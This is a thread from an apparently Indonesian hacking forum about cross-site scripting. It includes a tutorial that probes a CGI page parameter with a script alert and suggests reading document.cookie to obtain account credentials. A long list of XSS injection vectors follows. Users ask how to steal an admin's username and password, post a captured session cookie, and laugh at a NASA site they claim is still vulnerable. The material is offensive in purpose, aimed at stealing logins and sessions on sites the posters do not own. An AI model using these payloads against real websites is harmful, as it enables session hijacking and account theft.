Posts: 1,101
Threads: 76
Joined: Mar 2011
(08-26-2012, 01:38 AM)wine trochanter Wrote: om om tanya dong
biar bisa dapat pass sama username admin dg xss gmna yah?
bah,, disitu kan ane uda share script xss tuk lihat pass sma username..
tapi nda jamin berhasil trgantung web na..
coba aj gogling bnyak kok script tuk xss..
tpi jgn tuk jahat buat bcanda sma temen aj ya.. hahahha..
CAN U MAKE ME THE KING OF SATAN..??
Posts: 88
Threads: 25
Joined: Feb 2012
eh udah nyoba pake cookies alert dapetnya ginian
griya_id_session=d04e4fe0934d4f6e035097b26b8715d6
itu apa ya maksudnya
Posts: 16
Threads: 2
Joined: Nov 2012
(02-14-2012, 02:49 PM)cassaprodigy Wrote: kmaren ane gy iseng2 mumpung bru bsa online gy,,
walau hrus menahan sakit gra2 port TCP dikepala trus kbuka.. hedeuh lebay -_-":badpc:
ane iseng browse site,,coba2 xss ech kena..
nach ane coba jelasin ap tu xss..
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client ( menurut bahasa ane sndiri)
xss hanya merubah suatu halaman site secara temporary berbeda dngan injection yg kita dapatkan akses root hingga mrubah smua na hingga index na..
script xss yg biasa ane pke :
- HTML
- JavaScript
- Active X
- Flash
tu yg ane tw dan biasa ane pke buat cri xss
ane coba jelasin yg pke javascript aj ya...
klo yg laen na tnggal coba aj tnya sma mbah google..
ane dsni coba cari/tes dri file cgi,,soal na bnyak file di cgi yg bsa dxss.. -_-"
pasti pda pernah buka web dan ad tulisan.. " 404 - data.php Not Found " ato sjenis na yg mnandakan file ato halaman dri web trsebut yg tidak ada ato nda bsa dbuka..itu krena ada na dri file cgi yg merespon klo nda ada file didalam server ato web trsebut..
untuk jelas na lngsung aj ya..
/cgi-bin/program.cgi?page=downloads.html
coba dganti jdi
/cgi-bin/program.cgi?page=maho.html
psti bakal nongol " 404 - data.php Not Found " ato sjenis na,,
nach kita coba dech buat tes xss na..jeng..jeng..jeng
/cgi-bin/program.cgi?page=<script>alert('tes Maho')</script>
klo muncul kotak popup alert berarti bsa dxss dech web na..
kunci na apakah suatu web vuln terhadap xss , masukan script <script>alert('tes')</script> didalam kolom url web tersebut,,gampang kan,,
( tw gampang bgtu pain panjang lebar jelasin na ):badpc:
Ech tpi ada tpi na ni,,Selain script itu juga xss bisa digunakan untuk mengetahui password account dengan cara <script>alert(document.cookie)</script>.
inga,,inga,,( iklan mode on ) xss bsa permanen ato temporer slama web trsebut lom dpatch,, ( mudah2an nda pernah ) amin :badpc:
masih bnyak script yg dgunakan buat xss ( sbagian dkit dpet dri googling ) -_-" :
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
Dach dlu dech tutor dri biji kya ane lebih parah dri pengguna baru ( kta om computer_geex )
:apn: piss om
mudah2an pda paham,,ane coba jelasin dngan bahasa ane sndri soal na.. -_-"
sekian ya tha2 smua na..
makasih buat zee Maho ma om xsan-lahci yg uda nemenin ane :*
kereen nee om atas penjelasan nya.......
azeeeq........
root@punisher404:~# sudo IBT-Sumbar Crew
Posts: 1,101
Threads: 76
Joined: Mar 2011
(11-15-2012, 09:27 AM)Clound_Carbelius Wrote: ini om Web NASA :-bd
=)))=)))=))
wach tu padahal bug lama tpi kok masih ada ya..
suram jga admin na lom dpatch ternyata.. wkakakak
:nohope hedeuh -_-"
CAN U MAKE ME THE KING OF SATAN..??